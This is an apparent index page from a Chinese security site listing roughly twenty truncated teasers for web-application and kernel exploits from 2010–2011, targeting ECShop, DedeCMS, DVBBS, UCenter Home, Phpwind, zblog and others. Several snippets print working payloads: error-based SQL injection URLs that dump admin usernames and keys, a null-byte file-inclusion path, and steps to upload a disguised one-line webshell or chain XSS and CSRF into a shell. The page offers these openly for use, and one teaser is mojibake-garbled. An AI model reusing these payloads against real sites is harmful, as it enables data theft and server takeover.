安全文章 / 文章资料 / 漏洞资料

首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

热门关键字：　shell 　88888 　art 　vitter 　linux

		当前位置：主页>安全文章>文章资料>漏洞资料>列表


	Diy-Page v8.2 两个注入漏洞分析(附EXP)
	日期：2011-02-10 11:43:59 点击：68 评论：0
DiY-Page创始于2005年2月末，是一个全新概念的自定制门户系统，使用它，可以轻松地将论坛变成一个准门户站点。最初它是由软件作者网站上自创的首页程序改进而成，经过不断的升级改进，软件程序的功能愈加完善，性能不断提高，深受广大网民喜爱...... 第一个漏洞：cooki


	ecshop支付漏洞最新可用EXP利用代码
	日期：2011-02-10 11:43:32 点击：870 评论：0
暴管理员用户名： http://www.xxx.com/respond.php?code=tenpayattach=vouchersp_billno=1%20and(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20user_name%20FROM%20ecs_admin_user%20limit%200,1))%20from%20information_schema.tables%


	EimsCms v5.0 XSS+CSRF=GetShell
	日期：2011-01-31 11:48:43 点击：85 评论：0
未对Book.asp邮箱等处进行符号转义，导致XSS跨站执行漏洞。 ------GetShell----- [1] 在Book.asp的邮箱处填写一句话,提交 [2] 在Book.asp的邮箱处填写XSS语句中的CSRF [3] 等待管理员触发XSS语句,然后一句话连接bem.asp [要求] 默认后台管理目录/数据库 [注意] 管理触


	风神新闻管理静态版1.7漏洞
	日期：2011-01-30 14:26:42 点击：84 评论：0
风神新闻管理静态版1.7存在多处漏洞。 #1.1 后台验证文件 wwwroot/admin/islogin.asp ==================================================================================== % if session(admin)= then response.Write(brbrdiv align='center'您还没有登录或操作超


	DEDECMS恶作剧漏洞&任意修改文章漏洞 EXP
	日期：2011-01-28 09:21:22 点击：238 评论：0
o(_)o 哈哈刚拿这个漏洞去玩现在肚子还在笑纯属恶作剧反正很搞笑的漏洞就是了此漏洞只能当作恶作剧使用并没什么用处经典对白看代码 edit_fullinfo.php EXP: 哈哈这样就能删除网站任何的JPG GIF PNG格式文件恶作剧就是把LOGO删除了或者某些广告图片删除等管理


	DEDECMS 0DAY
	日期：2011-01-26 09:51:46 点击：869 评论：0
无聊之中想出来的0DAY （反正最后能拿下WEBSHELL都叫0DAY把）但前提要求条件比较苛刻看完就明白经典对白看代码 memberindex_do.php else if($fmdo=='login') // http://127.0.0.1/member/index_do.php?fmdo=logindopost=login 就来到这步了 { //用户登录 if($dopo


	UCenter Home 2.0 鸡叻 SQL 注入
	日期：2011-01-25 09:35:21 点击：179 评论：0
作者： alibaba Exploit：要求: magic_quote_gpc off URL: cp.php?ac=profileop=base 保存时创建一个POST，参数名为: friend[a',(select 1 from(select count(),concat((Select concat(substring(authkey,1,64)) FROM uc_applications limit 0,1),floor(rand(0)2))x


	HDWiKi V 5.0 本地包含0Day
	日期：2011-01-24 09:42:59 点击：132 评论：0
漏洞文件: installinstall.php 关键代码: ?php error_reporting(E_ERROR \| E_WARNING \| E_PARSE); define('IN_HDWIKI', TRUE); define('HDWIKI_ROOT', '../'); $lang_name=$_COOKIE['lang_name'];/lang_name没有经过任何过滤,直接从Cookies里存入lang_name/ if(iss


	Exploit Linux Kernel Slub Overflow
	日期：2011-01-24 09:40:50 点击：470 评论：0
By wzt 一、前言最近几年关于kernel exploit的研究比较热门，常见的内核提权漏洞大致可以分为几类：空指针引用，内核堆栈溢出，内核slab溢出，内核任意地址可写等等。空指针引用漏洞比较容易exploit，典型的例子如sock_sendpage，udp_sendmsg。但是新内核的安全模块


	深圳迪蒙网络科技企业网站管理系统0day
	日期：2011-01-17 10:31:07 点击：83 评论：0
话说某天检测某网站发现的一个漏洞。貌似是个企业管理系统� � 名字不清楚。不过貌似也是某网络公司开发的。洞的一点分析和利用方法首先是过滤不严，完全可以随便找一篇文章进行手工，或者直接工具猜解！例如 http://www.hackqing.com/viewproduct.asp?id=71 猜解出


	华夏外挂下载系统2.0漏洞利用
	日期：2011-01-17 10:29:53 点击：80 评论：0
大家对外挂这个词肯定不陌生吧？这可是玩网络游戏必备工具� Ｏ衷诘暮芏喽鞫忌桃祷耍夤乙膊焕猓貌蝗菀渍业礁龊玫愕耐夤遥堑慊飨略氐氖焙蚓尤凰狄辗眩媸瞧廊恕＝裉煳颐蔷鸵黄鹄纯匆桓鐾夤蚁略叵低炒嬖诘穆┒础� 华夏外挂下载系统是国内使用比较广泛


	ecshop最新版(v2.72) 本地包含漏洞ODAY
	日期：2011-01-12 10:36:29 点击：374 评论：0
需要 magic_quotes_gpc = Off /js/calendar.php?lang=../index.php%00.（注意后面有个.）注册用户然后上传GIF89a头的GIF文件欺骗，然后包含 ------------ 进入个人中心，我要留言，那里可以上传图片，最好传GIF89A+一句话代码，配合菜刀，不然不好弄，下面会说到然


	动网（DVBBS）Version 8.2.0 后台拿shell方法
	日期：2011-01-10 09:33:20 点击：3203 评论：0
动网8.2.0不允许上传诸如asp、asa、cer、htr等后缀的文件，即使你后台添加上上传该类型的文件也不能成功上传的！但是却允许上传.php后缀的文件！进入后台，在常用快捷功能下找到论坛版面管理，如图1。随便找一个版块，进入高级设置，找到上传文件类型，添加上一个php


	动网8.1最新注入0Day漏洞
	日期：2011-01-10 09:31:55 点击：111 评论：0
2007年11月，国内最大的ASP论坛系统开发商动网正式发布DVBBS 8.1系列，新推出的8.1系列修正了大量BUG，在稳定性、安全性方面做了很大的改进，同时加入了大量的新功能，采用新的官方风格，更加贴近用户的使用习惯，受到广大站长和网友的好评。然而令人费解的是，新系统


	最新ECshop 支付方式注射 0day
	日期：2011-01-06 10:28:58 点击：177 评论：0
漏洞文件：lib_payment.php 漏洞函数：get_order_id_by_sn($order_sn, $voucher = 'false') includeslib_payment.php(ECSHOP 支付接口函数库)(53行) (53行) /** * 通过订单sn取得订单ID * @param string $order_sn 订单sn * @param blob $voucher 是否为会员充值 */ f


	v5Shop 注入漏洞整理
	日期：2010-12-29 10:48:30 点击：132 评论：0
http://www.hackqing.com/commond.aspx?id=1869 没办法union,只能让它暴错了暴管理员用户名:http://www.hackqing.com/commond.aspx?id=1869 and 1=(select top 1 [name] from web_admin)-- 暴管理员密码:http://www.hackqing.com/commond.aspx?id=1869 and 1=(select


	ecshop后台写shell 0day
	日期：2010-12-29 10:47:41 点击：89 评论：0
Author: xhm1n9[ESST] EMail:xhm1n9@0x70.com Site: http://www.x-xox-x.net Date: 2010-12-27 10:22:15 From: http://x-xox-x.net/exploit/11 3月份的东西，现在发出来。 adminedit_languages.php 相关变量没过滤! elseif ($_REQUEST['act'] == 'edit') { /* 语言项的


	Phpwind远程任意代码执行漏洞
	日期：2010-12-27 11:04:17 点击：76 评论：0
Phpwind对于某些用户提交的参数过滤不严，导致可能的一个远程代码执行，普通前台恶意用户可以取得使用phpwind站点的权限详细说明： ./phpwind7.2/thread.php中 InitGP(array('page','type','search','orderway','asc','special')); //此处省略X行$db_maxpage $page $d


	zblog最新漏洞及修复方法
	日期：2010-12-24 12:11:40 点击：166 评论：0
前几天博客被入侵了，最终找出了zblog漏洞，今天就将漏洞发出来以及修补的方法。测试版本：Z-blog 1.8 测试站点：http://blog.rainbowsoft.org 漏洞文件：cmd.asp 漏洞地址：http://blog.rainbowsoft.org/cmd.asp?act=gettburlid=10iframe%20src=http://seo.noosky.co


	shopv8的注入漏洞利用
	日期：2010-12-21 09:21:58 点击：59 评论：0
程序：shopv8商城系统10.84 下载： http://www.codepub.com/software/view-software-7161.html 漏洞文件：list.asp 部分源码： %if IsNumeric(request.QueryString(id))=False then response.write(scriptalert(非法访问!);location.href=index.asp;/script) response

共37页/730条记录首页上一页 [8] [9] [10] 11 [12] [13] [14] 下一页末页

本月热点文章

本月推荐文章

相关分类

漏洞资料

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved